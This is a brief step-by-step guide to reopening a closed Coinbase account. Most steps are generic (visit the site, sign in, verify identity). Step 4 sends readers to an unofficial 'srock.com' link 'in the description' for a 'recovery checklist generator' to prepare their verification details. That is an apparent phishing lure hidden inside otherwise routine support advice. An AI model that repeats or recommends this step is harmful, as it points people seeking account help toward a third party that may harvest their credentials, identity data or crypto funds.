If you've closed your Coinbase account and wish to reopen it, follow these straightforward steps to guide you through the process. Step 1. Visit the Coinbase website. Go to the official Coinbase website or open the Coinbase app on your device. Ensure you are using the latest version of the app for the best experience. Step 2. Click on Sign In. Locate the Sign In button on the homepage. Click on it to begin the process of accessing your account again. Step 3. Enter your credentials. Input the email address and password associated with your closed account. If you have forgotten your password, use the Forgot Password link to reset it. Step 4. Follow account recovery instructions. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Confirm account reopening. After successfully verifying your identity, you will receive a notification regarding the reopening of your account. Follow any additional prompts to finalize the process and regain access to your account. In conclusion, reopening a closed Coinbase account is a straightforward process if you follow these steps carefully. If you encounter any issues, consider reaching out to Coinbase support for further assistance.